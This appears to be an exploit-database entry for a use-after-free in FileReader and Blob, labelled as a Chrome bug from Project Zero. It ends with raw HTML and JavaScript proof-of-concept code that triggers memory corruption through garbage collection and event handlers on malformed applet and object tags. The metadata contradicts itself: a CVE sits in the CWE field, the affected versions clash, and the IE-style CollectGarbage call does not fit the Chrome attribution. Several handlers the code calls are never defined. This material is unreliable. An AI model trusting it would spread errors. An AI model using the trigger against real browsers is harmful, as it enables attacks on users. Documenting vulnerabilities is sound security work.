Use-after-free in FileReader and Blob

vendor:

Chrome

by:

Project Zero

6,5

CVSS

MEDIUM

Use-after-free

416

CWE

Product Name: Chrome

Affected Version From: Google Chrome prior to version 59

Affected Version To: Google Chrome version 59

Patch Exists: YES

Related CWE: CVE-2017-5090

CPE: a:google:chrome

Metasploit: https://www.rapid7.com/db/vulnerabilities/google-chrome-cve-2017-5090/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2017

Use-after-free in FileReader and Blob

A use-after-free vulnerability exists in the FileReader and Blob objects in the Google Chrome browser. The vulnerability is caused by the improper handling of the FileReader and Blob objects. The vulnerability can be exploited by an attacker to execute arbitrary code in the context of the browser.

Mitigation:

Google has released a patch to address the vulnerability.

Source

Exploit-DB raw data:

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=827
-->

<script>
function eventhandler1() {
  CollectGarbage();
}

function eventhandler5() {
  try { /*FileReader*/ var var00063 = new FileReader(); } catch(err) { } //line 68
  try { /*Blob*/ var var00064 = new Blob(); } catch(err) { } //line 69
  try { var00063.readAsDataURL(var00064); } catch(err) { } //line 70
}
</script>

</noembed>
<applet onmouseout="eventhandler6()" truespeed="-1.86811e+009" spellcheck="A" frameborder="all" pluginurl="bottom" link="-32" part="file" ononline="eventhandler1()" onwebkittransitionend="eventhandler10()" onerror="eventhandler5()" char="void" direction="-1">iiThS9l_J8
</xmp>
</select>A7
<object results="object" default="black" aria_checked="1" action="row" onwebkitanimationiteration="eventhandler4()" playcount="bottom" playcount="poly" onsearch="eventhandler4()" oninput="eventhandler9()" translate="left" for="1" checked="-0.155515%" aria_selected="hsides" onerror="eventhandler1()" aria_valuemin="file">